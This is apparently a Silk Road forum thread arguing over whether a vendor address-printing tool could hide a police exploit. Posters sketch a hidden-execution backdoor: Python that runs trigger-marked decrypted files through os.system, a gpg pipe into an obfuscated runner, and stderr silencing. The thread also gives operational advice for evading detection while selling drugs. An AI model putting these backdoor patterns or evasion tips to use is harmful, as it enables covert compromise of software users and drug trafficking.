I can't be 100% certain, but reading material on image exploitation, you quickly come to the understanding that doing one would likely have to involve the use of a zero day exploit. Even if it were not at that level of difficulty, it's definitely somewhere in that ballpark. How do I know? Because I'm typing this right now and am not in police custody. If it were easy to do, LE would have already done it to everybody on SR.
Once again, I never said it would be easy. I said that the strategy behind such an attack makes more sense than what you're claiming I'm doing.
The LE accusation only holds true if the code can somehow report on users, which it doesn't.
We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.
And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive. I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.
Yes, you're correct.
My attitude is paranoid because you have to be to survive here. I am accusing you of very suspect LE-like behaviour and it's completely irrelevant to the discussion whether me accusing you of being a LE agent hurts your feelings.
My feelings? No. But you're attacking my reputation and even though this is a pseudonym I feel it is worth defending.
You may notice that I haven't, for example, given either you or Kmf any negative karma for what's happened in this thread.
If the drug war ends, and it turns out that you were not a LE agent after all, but a python programmer with a lack of introspection who intended to do the right thing, then I will personally give you five hundred US dollars to recompense you for lost custom and aggravation, along of course with a sincere apology. Unfortunately this is unlikely for reasons beyond our control.
It is unfortunate, you'd be down $500, but I'd want that apology in writing and signed.
Today's situation is that you look extremely guilty to me.
As the old saying goes, looks can be deceiving.
Of course it wouldn't make a jot of difference if you posted code to the forums. We *have no* way to know it was the code or a version with the exploit edited out of it.
Not rocket science!
So you can make this argument about posting code to the forum, but can't see how it applies to checksums. That makes it look like you're only applying logic where it supports your argument.
The thread is not about pine trying to get free software out of some open source fanatical resolve, it is about the very great difficulty of trusting somebody who has acted in a very suspicious way.
Once again, trust is not required.
As for auditing the code, find me a decent Python programmer on Silk Road and I'll talk to them about auditing it.
It can quite easily run on a completely disconnected system. It makes no difference to the program.
Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.
Then they should employ one. Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install. Data transferred to it via read-only media and no data EVER transferred off it and it's done. How much would it cost using hardware from 6 or 7 years ago? Fifty bucks? A hundred?
If as a result of this thread every vendor went and got an Air Gap, I would be flabbergasted. Delighted, but in some kind of shock.
Sounds like a good basis for another project in the Security forum along the same lines as PGP Club.
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.
While it is obviously the case a vendor could make 'batch replies' or 'batch reads' if not replying, you are trivializing what is a serious amount of work and more importantly the delay in responding to customers. You're also missing the fact that a great many vendors are transient vendors, not permanent fixtures to the marketplace, in fact the majority of them are probably temp vendors rather than in it for the long haul.
This only holds if using the bash script I posted in this thread on, I think it was the second day (I can't tell you which page because I changed my settings to display 25 posts per page a while back).
-
In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.
Yet there are ways for anyone who buys it to do so. Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.
What? So it costs 150 dollars and an LE agent becoming a member of the community per exploitation delivery? I think a LEA would be quite happy with that kind of return on investment to be honest. Don't talk as if you've a lot to lose if my suspicions are correct. You don't.
Well, since your suspicions are not correct, I don't have a taxpayer funded law enforcement budget.
And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.
Which proves the point I made above, you've made up your mind and there's nothing I can do to change that. As I said, even if I were to post all the code now you'd still think I was up to something.
What I have made my mind up about, is that your actions are incredibly suspect and lead me to believe you could be a LE agent. Of course this cannot ever be proven on an anonymous forum. And as I said before, that posting the code is irrelevant is merely a statement of the obvious.
And if I had given the code away for free by posting it to the forum then it wouldn't have been "sketchy"? Even if there's no one here capable of auditing it?
Your statements here are a logical fallacy, what in debating is called "Tu Quoque". In English, you think that by answering a criticism with a criticism, that you are engaging me, when in fact you're avoiding the main point which is that we can't trust people who have sketchy behavior.
Oh, I'm answering your arguments, I'm also levelling my own criticism. Those two things are not mutually exclusive, much as you might wish it were otherwise.
If your response was along the lines of "I am not a LE agent, but I can see that this looks a bit suspect to you because if I were hypothetically LE I could be trying to deliver an exploit, in future I will do X {checksum/ do proper independent audits, make it publicly available} so that the software could be validated against containing exploits"
As it happens, between your own logic disconnects, I can see some points of concern.
Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed. A proper independent audit would be great if there were someone here capable of doing it. Giving away my work for free is out until I can devise a new business model which can address that that's not some useless tip jar.
then I would be still mad that you didn't think of the necessity of software auditing on a forum of criminals, but nowhere near as mad as I am now, because your position is essentially this, when you take out the verbiage:
"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"
Which brings us back to employing an air gap or just not buying the software.
Not quite. The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet. I'm certainly not inclined to right now.
This is pretty much the only argument you've made I agree with thus far.
Frankly I think no vendor in their right mind should be using Windows. Actually, no one here should be.
Having said that, the future of the program, is to get rid of the shell scripts and do everything in Python. At which point it might (would?) run on Windows. I'll never test that, though, I haven't had a Windows system this century.
-
Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.
^this
OP is a clearly wanker with just enough knowledge to be opinionated but not enough to be informed or accurate about it.
-
A general point I neglected to mention which may explain some of this situation:
People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.
That is interesting since DPR already knew what I was doing before I made the listing. He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.
You're right about the agorist philosophy behind his response too. You were asking him to regulate the market, which is the antithesis of what an agorist market is.
Actually, after informing DPR of my suspicions, I asked for something quite different.
Which was?
It's even simpler than that: If you don't want to use it for whatever reason, don't buy it. If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.
That is priceless. So... you're implicitly saying that in the time frame it takes:
A: You to realize this, which you almost certainly won't since that kinda misses the point of a deanonymizing exploit, and
B: The time it takes the police to grab you by the time you realize they are inside the building.
That the vendor will somehow obtain Internet access and dial up SR with a complaint. Because when a criminal is involved in computer based crime, LE agents always give them access to a laptop so he can skype his lawyer or whatever. I mean you're actually right, I cannot believe I did not think of this before.
Hrmm, okay, good point.
And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.
This is not true at all.
It is not as simple a brief Ctrl-F to search for code that makes network connections or examine I/O, finding exploits can be difficult. Myself and kmfkewm have come up with at least two perfectly plausible methods that are difficult to detect, and it's not as if we've spent months and months working out all the angles to make it come good like a real exploit tiger team would be doing.
It does take more than just searching for the obvious, but if all IO operations are found and found to be clean then xollero is right.
In SROPPy all the IO operations are incredibly obvious. In fact, let's see if there are any other Python coders present, here's one of the files in SROPPy 1.1. It reads a text file (text-files.list) containing a list of all the .txt files generated by the decryption command, reads each text file (username-transaction_number-address.txt) and then rewrites them as HTML files (username-transaction_number-address.txt.html). It's one of the largest files in that version (at a whopping 545 bytes).
text2html.py:
#! /usr/bin/env python
# Copyright (C) Louis Cyphre, 2012
# lcyphre@tormail.org
# Converts address text files to HTML
txtlist = "text-files.list"
lfile = open(txtlist, "rb")
ldata = lfile.readlines()
lfile.close()
for string in ldata:
tfile = open(string.rstrip(), "rb")
tdata = tfile.readlines()
tfile.close()
nfile = open(string.rstrip()+".html", "a")
nfile.write("<html><body>")
for string in tdata:
nfile.write(string)
nfile.write("<br />")
nfile.write("</body></html>")
nfile.close()
Now let's see if an exploit is buried in there. By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.
As for Kmf's exploit, it made certain assumptions about network connectivity, the level of similarity (or lack thereof) between Ruby & Python and exactly what the --decrypt-files flag does in GPG (he assumed it writes to stdout, which it doesn't). I'll get back to him later.
-
Does the trigger string need to be part of the code or does it just tell the existing code to activate?
It needs to be part of the code, I included it as a comment so that it has no effect on the script but still signals to the original script that it should pipe the plaintext to irb.
Right, well I don't think there would be any way to do it in Python without an if statement, otherwise you'll end up with a lot of error messages being piped to stdout for every address file that did not contain exploit code. It would need to be inserted after the decryption command (not with it because --decrypt-files reports the results of the decryption process to stdout, but not the decrypted data), but before the checking of the plain text content. Since there's nothing after decryption in the relevant files, that's easy to spot.
Which means your exploit in Python would be a bit like this:
import os
path = "."
text_files = [f for f in os.listdir(path) if f.endswith(".txt")]
evilstr = "trigger string"
for string in text_files:
with open(string, "rb") as searchfile:
for line in searchfile:
if evilstr in line:
os.system("python "+string)
# report nothing, including any errors
# requires more code to hide errors
# plus add even more code to rewrite payload with
# plain address
else:
# do nothing, report nothing
To do it properly so it never reported any errors to stdout would require enough code to rival the size of the largest file in the software package. Actually, the above already does, so with the code to hide output of any errors it would be the largest bit of code.
I don't think it would be possible to conceal it, not with the way Python is constructed. Since all of the above would have to be required to run whatever nastiness is hidden in an encrypted address file.
Spotting that would not be rocket science. And here's why that is so.
Simply piping all the decrypted data through the Python command would result in a large number of error messages like this (sample text file included):
bash-3.2$ cat address.txt
Mr. L. Cyphre
666 Hells Highway
Hades
bash-3.2$ python address.txt
File "address.txt", line 2
666 Hells Highway
^
SyntaxError: invalid syntax
bash-3.2$
So your exploit in Python would either be obvious due to a large amount of very unexplainable code or a large amount of error messages being displayed every time the code is run.
Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too). I've already said several times what modules are imported, so there goes that.
pack changes how data is displayed. For example I could unpack the string "see" into binary representation : "see".unpack("B*") == "011100110110010101100101"
and I could put that in an array and pack it back into a string ["011100110110010101100101"].pack("B*") == "see"
Yep, that's the same as struct.
Hell, there are only two files with integers in them (to read data in each row of the CSVs). Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it. Obviously in the case of those three files the number is part of a string and not an integer.
These numbers are strings also, anything in " " is a string.
Ah, okay. The "" at least is the same as Python.
-
i haven't been following this thread that much but dont u think LE would just set up a bunch of fake buyer accounts and order all over the country using different vendors? like i wouldn't b surprised if DEA has been keeping a profile of all the vendors. i'm not trying to freak anybody out but i'm just saying i think buyers would be the people to be most suspicious of.... no intelligent cop is going to advertise a product regardless of its legality. they're more interested in the packaging methods and return address, WHICH IS WHY ALL OF THESE THINGS NEED TO BE CHANGED REGULARLY. i've made multiple purchases from the same vendors and the outer packing is ALWAYS the same. i thought the whole idea was that it would not be able to be traceable back to anyone, meaning the inner and outer packaging should be constantly changing. but vendors are using the same outer packaging as well as inner packing. so far i've had 2 truly stealthful packages and that was from Northern Dancer (favorite seller on SR) and from reich ( who does in fact change his packaging quite often from my observation. anyways yea i'm rambling i'll shut up i just think so many ppl are so paranoid. the usps is BROKE AS FUCK i'm sure they're lettin alot of shit slide atm.
-
shit's crunk like too much junk in the trunk.
i really hope Louis is not LE.
i really hope pine is the boss that we have come to enjoy bossing.
and... kmf is a boss like kkefka from the Final Fantasy series, lol.
sorry... late night roxi30 RANT.
super duper high priest. level85.
hope everyone had an amazing day and an even more amazing night.
sleep tight, all right. all good. life's good.
/thumbs
-
sorry... late night roxi30 RANT.
super duper high priest. level85.
All I can say is I'm glad you're here.
/thumbs
-
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Get off your high horse.
This is not a courtroom. This is the black market. You did something incriminating. That is more than enough to justify labeling you a as potential LE agent.
And now you're backtracking from definitely an LE agent to potential LE agent. There's a big difference; it's the difference between suspicion and proof.
You still have no proof and no one has yet analysed any of the code I've posted in this thread. Which I'll grant isn't the whole package, but the Python code (as distinct from the earlier shell script) is one of the files in version 1.1 of the code you're critical of.
As such, Louis has the right to market his wares under any conditions that he deems fit.
Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.
Not true. Pine tried exactly that before starting this thread. See this post from her details earlier in this thread:
http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841
That doesn't say I tried to ban you at all. That was just your interpretation of why you think I went to DPR. And it is true, I didn't ask DPR to ban you, I had something quite different on my mind.
I asked to setup a dummy buyer so we could obverse what happened in a remote controlled environment, with the intention of following an exploits comms (if it was that kind of exploit) and tracing it back to the destination IP address, which is almost certainly going to be a DEA office.
That would have been interesting. I would've loved to have seen the look on your face when you realised it didn't. Oh well, there's still a chance that someone in your camp will try it on an isolated system.
After some consideration, I agree with DPRs assessment that calling you out in the open about this was more effective on several counts. Not only did it create a discussion interesting in terms of illustrating how exploits can work and spreading some security awareness on that count,
It's certainly an interesting discussion.
but having your RL identity could have turned into more of a problem than a solution.
Or nothing at all. *sigh*
It might achieve proving you are/aren't a LE agent (no IP),
Yep.
but the downside is that if you are a LE agent, then the temptation of coercion would leak in, not now, but if this war went hot suddenly, it'd be a temptation to retaliate directly, simply because it would be easy and satisfying.
Ah. Interesting line of thought.
Good thing the only thing in the code that could correlate to me is the coding style, but since it's all very basic code that would lead to a lot of places, including sample code posted to stackoverflow.com, so I'm probably good there. Some of it came from other GPL projects which I know were influenced by various O'Reilly books (which are very common amongst coders around the globe).
This is of course defiles the moral objective of this enterprise. Even LE agents shouldn't have to fear this specter, enough people have suffered and bled for this war already. I would hope there exists a 'anti-pine' on the other side that takes the same view. More pragmatically, it would make this war ever more intractable and draw more resources against the darknet markets, the entire thing could spin completely out of control if we suddenly started with such an active approach.
Yeah, that's fair enough. Don't worry, though, if someone does try that kind of inverted controlled delivery there's nothing that could result in anti-LE retaliation.
Ah, but this isn't really a review of the product, it's your assertions about it with no evidence. You already know how to get the evidence to prove one of us right, you're choosing not to.
Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.
As repeatedly explained the problem is that there is no way to know what you "intended" to do vs what you choose to show us later on.
Other than doing what you've ruled out above; creating a new account and buying the product.
It is wrong to say that his product IS backdoored. It is wrong to say a vendors product has been cut with Drano if you have not purchased some and tested it. it is not wrong to say that PMA is dangerous if a vendor is selling PMA.
Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done. You have not actually obtained the code and proven that it does contain such an exploit.
I have written the code and stated there is no such exploit. You have yet to prove that I am lying.
Another major vendor is running the code and has stated that it does exactly what I said it did. You and Pine have been unable to prove that false.
We don't have to prove anything. You don't get it. The burden of proof is on everybody on SR not to act in sketchy ways.
Then I mistakenly believed that because one vendor approached me to write the code in the first place (after answering an obscure GPG question in a PM) that others might see the value in it too. Perhaps I erred in this.
If you are not LE, then I certainly know you're new to these markets.
No shit, Sherlock. I've been here for 3 months.
The burden of proof has always been on the person the question is being asked of. It is up to you to prove your innocence by not acting in incriminating ways rather than the other way around. On the white market, in civilian courts this is the other way around.
That's a good point.
Normally that proof is provided by engaging in illicit activity. There's a thread around here somewhere which shows that my involvement in teaching people how to use crypto for the express purpose of engaging in illicit activity would be enough to get me bundled off to a US prison (maybe extradited, maybe not) if they knew who I was. Perhaps I mistakenly believed that was enough to establish my bona fides, but I guess not.
You seem to have the idea that this is supposed to be fair. This is an amazing idea, clearly you are new to criminality.
Hahaha! :D
The other day I tried to work out how long I'd spend in prison if LE knew who I was and everything I'd gotten up to over the years. I'll give the traditional "no comment" to that.
It is fair to say that I am new to drug markets like SR, but I've always avoided the ones on the clearnet because operating that openly is pure insanity.
Louis, you could have 1000 reviews, but they could all be LE buyers collaborating with you to form an illusion of reliability. The only way we can see to prove the code that you are giving us, and the code other people are executing, is the same code, is if it comes from the same place i.e. a forum thread on here. Believe it or not, LE agents lie sometimes, even lying about themselves lying. Incredible, I know! Who would have thought them so unscrupulous!
I'm still considering the possibility of posting the whole thing, but I don't particularly want to. If I did then it would be posted without documentation or code commentary included (which would mean the checksums wouldn't match). It also wouldn't be supported (and I'd post a service product for doing so at a rate that would lead to me receiving something close to my real life professional rate. Let's just say that buying the current listing is significantly cheaper than that.
If I am paranoid and 'accusatory' (probably because I'm actually accusing you, no?) then you've been seriously obtuse by pretending many things are more straight forward than they actually are.
Paranoia is just seeing a threat where it doesn't exist, so in this case that's exactly what you are.
Air gaps. -> They are not simple for most vendors to use.
Perhaps, but I don't think they're as difficult to setup as you're making it out to be. Still, we've gone round and round on this one so the next step is to provide guides in the Security forum to operate an air gap system properly.
You want to make extra money. -> But you intend to sell to what is probably literally SR's smallest market.
True, but it's a good way to see if it is worthwhile spending any time on widening that market.
Computer programming. -> Not everybody is able to follow it, even when explained in detail. Probably because it takes months/years to learn it.
Yes, well that's a fair call. People are different.
Open source. -> But only non-programmers will be reading the code. I'm sure there's a soviet russia joke in this somewhere.
Still better than trying to sell a precompiled binary.
You guys have to prove I tried to pull off an exploit. -> Except nobody independently generated a checksum since you didn't think to request it in the first place, we have no idea if you're giving the original code. It's not as if one or two people would be enough either, you'd need lots, having auditors signing your program would also work, but both principals are based on the fundamental principal of counting.
And having enough trustworthy auditors willing to participate. Which appears to be a big stumbling block here.
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.
The difference is as follows:
1. It's impossible for a drug seller to really prove that they'll always be shipping something safe. It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.
Two problems here:
1) A programmer could release code that is safe and sell something else.
Holy cow, I think we're getting to you at last!
Meh. I've always been aware of the issue between selling my work/services vs. working for free and posting the code. My biggest "crime" here has been wanting something for the effort I've put in (unless you speak to real LE, in which case my biggest crime is providing knowledge and software to aid criminal enterprises).
2) Releasing the code freely cuts out payment for the work put in, as I've explained previously.
If you're not LE, then that sucks, but there is nothing you can do about it, you just have to deal.
Clearly.
2. If a drug dealer ships something unsafe then 1 person has a bad reaction. If louis widely gives out malware specifically targetting vendors and information regarding their vending then thats a major blow to silk road itself.
That's a big if. Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum. Until someone does then this is all conjecture and baseless assertions.
This appears to be a problematic concept.
- We are saying that your profile of targeting vendors, esp. large vendors given the price tag, with code they can't read, which was your initial proposition, is very LE-like.
- The above ^, is not evidence you are LE. There is no evidence you are LE as I've already said, it's not actually possible to obtain any. It just strongly implies that you are.
More backtracking. Your first post was written in a way which basically says there's no other possible explanation. In conjunction with using your own personal definition of what open source meant.
There is no practical difference between "I think he is probably LE" and "This guy is LE". In RL the reception is the same, and it doesn't change here. The title of the thread is about obtaining hits, because a wishywashy "I think maybe perhaps, sorta, coulda be LE" doesn't quite have the same resonance. I am accusing you of something. This is not equivalent to making a scientifically provable statement. It is called an opinion. You can go create a thread called "Louis is not LE" or something. Same applies.
Finally! It's nice for you to finally admit that it is just conjecture and opinion.
The big ask, which is NOT on you, is that people think for themselves instead of takig what you or me or anyone else says on faith. A point which you've already made elsewhere in this thread too. I don't think either of us will be holding our breath waiting for that to happen.
The fact is that while people should think for themselves, they frequently don't. As much as you might wish it were otherwise, you have used your standing in these forums to make uncorroborated mud stick to me and you know damn well that's the case.
You think I give a flying fuck about how affronted you are when there was a fantastic opportunity vendors using your software would have got busted if this had not been made public.
No, I think you're taking advantage to make sure your suspicions are accepted as fact. That's all.
Even if you don't think it's a case of 70:30 ratio of Louis being a LE agent, most people in this thread think the opportunity cost of being wrong is too high even if the ratio was 10:90.
Perhaps, I'll guess we'll see.
For the record on my part, I think this has been a healthy albeit awkward discussion that has made the dangers of software exploits abundantly clear.
It has certainly been interesting.
If this was a LE project, it has failed miserably.
Once again, it isn't. I'm sure the real LE reading the forums must be having a good laugh at it though.
If Louis feels offended, well, that's just too bad. If he's around after the drug war and it is shown I was wrong, then I'll be delighted to compensate him.
It's easy to make promises you'll never have to make good on.
-
/nerds
-
By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that. Wow.
Ruby does bytecode but in most implementations of it there is not a (easy , or intended) way to launch programs directly from bytecode. Also I think Ruby is 20 years old not 18.
I was going on the first release date on Wikipedia, not design documents or anything else.
As far as how many people here know C and can audit it, I assume quite a few actually. I have had no problems finding a whole lot of people to look over any of the code I have ever written. We are on a forum on the darknet where everyone uses crypto, there are probably hundreds to a thousand professional and hobbyist programmers on this forum.
That would be good, hopefully some of them are Python coders and will speak up. Maybe even enough to look at one of the Python files I posted from version 1.1.
-
Every time a vendor has to make a reply to a customer, they have to burn data to 2 read only DVD/CDs. Once to find out what the message was, once to make the reply.
Actually at least in one direction they would need to hand type the information over. Using DVD's in both directions would break the air gap.
As America discovered with SIPRNET. It was RW DVDs that (allegedly) bridged that air gap.
-
it seems to me that you could just do this instead
os.system("gpg --decrypt-files *.asc | some_(obfuscated?)_way_to_run_the_output_as_a_script")
Nope, because your later comment:
actually I don't think it will work with --decrypt-files because the output is handled differently, I think it it would indeed take more code to do it with that flag being used instead of -d.
Is correct.
You'd either have to enter your passphrase for every encrypted file (which defeats the purpose) or use gpg-agent to cache the passphrase. Since gpg-agent and pin-entry only work in GPG 2 and above, I chose not to rely on it. Most Linux and BSD systems ship with GPG 1.4.x by default.
although I am not sure if python comes with something like ruby's irb that would allow you to pipe a script to it to be immediately launched.
Calling Python on the command line will do it. In fact many Python files are run by typing:
python filename.py
-
Don't buy software from people on SR, end of
-
You're making the assumption that data needs to be transferred bidirectionally across the air gap. The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes. Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.
Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.
Splendid idea in terms of security, separating PGP public keys from PGP private keys on two different machines. But I've yet to hear from these hordes of Air Gap using vendors. They are a figment of your imagination so far as I can see.
Because you know, I thought this software was to aid the business of decrypting addresses, not upgrading the vendor's operation security to be using Air Gaps.
It is. The sole purpose of the software is to take data, decrypt as necessary and rewrite the data for printing.
I'm pretty sure this only occurred to you inside this thread, you admit the use of Air Gaps was not part of the original plan, right? It's not in your advertisement anywhere. This was an afterthought. Is that something you're able to admit? If you're not going to update your advertisement it's just this thought experiment you had this one time.
The original concept, which has not changed, is to provide a streamlined method of getting data from SR to a printer. The code does not make any network connections whether a network is available or not. I don't really care personally whether someone employs an air gap or not, that's up to them.
The air gap idea only entered the discussion when you and Kmf started trying to demonstrate how an exploit could work if there was not an air gap in place. Which is when I pointed out that if networked code was included an error would be generated if a network was not available. I then pointed out that if an air gap was used and no error message was triggered then it would go some way to proving that it didn't try to open a socket anywhere.
Now that only goes some way towards the proof, because it is possible to write code to redirect all the output to the bit bucket. Here's an example from stackoverflow.com of how to do that:
import sys
class DevNull:
def write(self, msg):
pass
sys.stderr = DevNull()
The easy way to spot that, though, without even reading the code is to run any of the code with files missing (e.g. the CSV files). If the Python traceback messages appear complaining about the files being missing then stderr is not being rewritten.
Since I used traceback errors during development with the original vendor, that's a good indication that I didn't use the above or anything like it. Still, I don't expect you to believe that, I'm just mentioning it because it happened.
Since using Air Gaps is so simple, your customers should have no trouble going over this new paradigm according to you. Amongst other things, I contest that, it's rather exotic thing you're expecting us to believe.
I don't really care whether they do or they don't. I've only used an air gap as an example of a system configuration with no network access when attempting to explain that the code does not need network access and contains no exploit which would need one.
That said, encouraging vendors to use an air gap is worthwhile.
I cannot comprehend how your customers are expected to adopt tippy top best practices, when the real security vulnerabilities lie with trusting yourself. Your No.1 goal should be removing the necessity of trusting LouisCyphre and replacing it with cryptographic forms of trust from the outset.
Well, customers will receive a gzipped tarball or zip file that is encrypted to them, encrypted to me and signed by me so that they can be sure that what I send them really does come from me. Checksums won't help as much as you think, except to help me prove that any code that someone obtains from me and posts here really is what I am selling.
As for trusting me, or not, I never claimed that they should. Which is why I wrote the code in a way that enables it to be run on an unconnected system. Physical trust beats cryptographic trust every time.
-
sorry... late night roxi30 RANT.
super duper high priest. level85.
All I can say is I'm glad you're here.
/thumbs
thanks []D [] []V[] []D.
and ,i, am glad you're here.
/thumbs
-
Don't buy software from people on SR, end of
+1
-
First, I just wanna say HELLO Louis :)
Second, I want to put a disclaimer on this post: I only just started posting on the SR forums so I realize I don't have any credibility at all. And I am also not saying this is the only possibility, but it could be one of them. I also know very little about coding, I haven't looked into it at all--which is changing now. Yes this is all conjecture, but I enjoy thinking about this kinda stuff.
Despite those handicaps, if you would indulge me, I just have a couple thoughts on this (after having read the whole damn thread just to make sure no one else had addressed these ideas. Although I guess the chances of that were pretty slim lol.
I already know this is gonna be long and might sound crazy..but hey if you can't go crazy sometimes you'll probably go insane ;D
What if instead of going for a straightforward attack on vendors one at a time like might be expected, this is actually the second or third phase of a very elaborate operation. An operation whose sole end goal is to shut down SR in one fell swoop, including the big buyers (maybe the small ones too), vendors, and all the way up to the big cheese, Dread Pirate Roberts himself :o
This whole operation would take at least a year probably.
1.The first phase may have been to insert a large number of LEO in SR and the forums to get a lay of the land, so to speak--compile profiles of big players and gain as much information as possible.
2.The second phase (or first if you don't count the other LEOs as part of this plan) was to introduce an individual/small group, adept at software coding, and have him/her/them infiltrate the social environment of SR and gain people's trust by helping some people with minor issues and rubbing shoulders with some of the more influential members.
3.The third phase is to introduce a new precedent to SR--selling software to vendors. This would be accomplished by selling legit software at first, no malicious scripts. Just to get their foot in the door. Then as time goes on people become more accustomed to the idea, and the software gets more and more complex, with less and less scrutiny as the software continued to be useful. Maybe with an extra script here and there, that may not be activated until the final piece is added.
4.The fourth phase is to shut the door to the trap all our vendors willingly walked into by downloading anonymous software, and shut down SR if they get DPR. If he gets away then they will have arrested almost all the sellers and then its virtually shut down, at least for awhile. And LE gets to say they made "the largest nationwide bust on a criminal conspiracy organization that was making use of advanced encryption and an almost untraceable and completely virtual currency."
I personally wouldn't put it past LEA to do any of this, especially since how else are they going to shut down the Silk Road? (Other than make BTC illegal or regulated to death.) Not to mention the extent these people will go to when it comes to engineering some impressively elegant malware and how much time these people will put into a case. This is a link to a Wired article about Stuxnet. It seems to be on par with the idea that LE would be patient when it comes to shutting down something like SR and proof that there are extremely advanced viruses out there that are funded by governments.
http://www.wired.com/threatlevel/2011/07/how-digital-detectives-deciphered-stuxnet/all/
Louis could be that individual, of course I cannot know with complete certainty. However, there are just so many red flags about this guy and his posts that makes me extremely wary and should make everyone on here think twice about buying his software.
I don't think pine calling him out was part of the plan, but he could turn this whole exchange into a pig plus for LE and the very operation they had already planned. With pine and kmf haranguing him about the possibility of malicious code in this particular piece of software:
http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e
when it finally is discovered that it doesn't in fact have any in it then they look foolish and prejudice for jumping down his throat about trying to sell unaudited anonymous software to all the SR vendors (yes that was the first flag like pine pointed out quite aptly). While louis basically gets the protection of double jeopardy after having been falsely accused. This obviously wouldn't provide any real immunity if he was discovered to be shoveling malware onto the road, but it might reduce the chances of him being discovered, simply because no one wants to look like an idiot--although I know that will never deter pine ;) which I'm totally behind. Vigilance is the cost of liberty.
But back to the first flag, it could have been naivety until he consistently rejected requests to have in posted on the forums so it could be audited (second flag) it seems like he doesn't want to seem eager about getting this out to vendors, but I'm guessing the plan was to just wait long enough to not draw suspicion, but eventually just has to get it to vendors, cause that is his objective. The reason he gave for not wanting to give away the coding was that he wanted to get paid for his work. Which is completely fair. Except there is a huge risk involved in just taking his word for the safety of this software. I mean worst case scenario (if it turns out to be possible) is the complete eradication of the last vestiges of true freedom left in this country. I agree with many of you in the idea of not sacrificing the principles this entire movement(?) is based on for a little security.
However, I also am not about to lose this fucking site and this one serious chance I've seen to change the future. There has to be a level of pragmatism here and it comes in the form of skepticism and caution. If louis wants to keep trying to sell his software I frankly don't care, but don't expect people to just accept this kind of risk. I doubt he will have any takers, especially after people had the opportunity to read up on all the dangers of exploits in scripts.
Third flag is his logic on selling the software rather than make it available to everyone and accepting donations. No one is going to buy it as it stands now no matter how many times he insists nothing will go wrong and he'll guide you through every step of the way. It costs too much, its an enormous risk, and not just for individual vendors. If he posted it for donations then he could get direct, instant feedback before he started selling it to people, btc, and the opportunity to offer more software to SR, just as long as everyone knows what they're getting. And with that repeat business/donations he would make more than just sitting around waiting for someone to buy the way overpriced one.
Fourth through Ninth flags are just his posts (not really in any particular order)
text2html.py:
#! /usr/bin/env python
# Copyright (C) Louis Cyphre, 2012
# lcyphre@tormail.org
# Converts address text files to HTML
txtlist = "text-files.list"
lfile = open(txtlist, "rb")
ldata = lfile.readlines()
lfile.close()
for string in ldata:
tfile = open(string.rstrip(), "rb")
tdata = tfile.readlines()
tfile.close()
nfile = open(string.rstrip()+".html", "a")
nfile.write("<html><body>")
for string in tdata:
nfile.write(string)
nfile.write("<br />")
nfile.write("</body></html>")
nfile.close()
Now let's see if an exploit is buried in there. By the way, if that doesn't add up to 545 bytes then it just means there were more blank lines at the end, so add carriage returns (in Vim or Emacs) until it does and then check the SHA sum.
Easily proven wrong with SHA256 checksums. Actually, there's a point, better go and add that for the individual files.
Checksums were considered originally, but as I've stated they only help me to prevent a future possibility of being framed.
